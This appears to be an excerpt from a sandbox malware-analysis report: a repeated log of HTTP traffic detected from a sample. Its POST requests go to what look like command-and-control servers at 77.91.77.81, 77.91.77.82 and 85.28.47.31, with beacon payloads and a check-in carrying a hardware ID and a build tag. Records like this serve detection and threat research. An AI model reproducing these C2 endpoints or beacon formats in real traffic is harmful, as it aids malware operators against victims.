                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAFCAFHJJDBFIECFBKEHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 41 34 32 41 32 42 37 30 44 38 43 31 37 33 30 36 37 37 36 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 43 41 46 43 41 46 48 4a 4a 44 42 46 49 45 43 46 42 4b 45 2d 2d 0d 0a Data Ascii: ------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="hwid"8A42A2B70D8C1730677652------GCAFCAFHJJDBFIECFBKEContent-Disposition: form-data; name="build"sila------GCAFCAFHJJDBFIECFBKE--
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
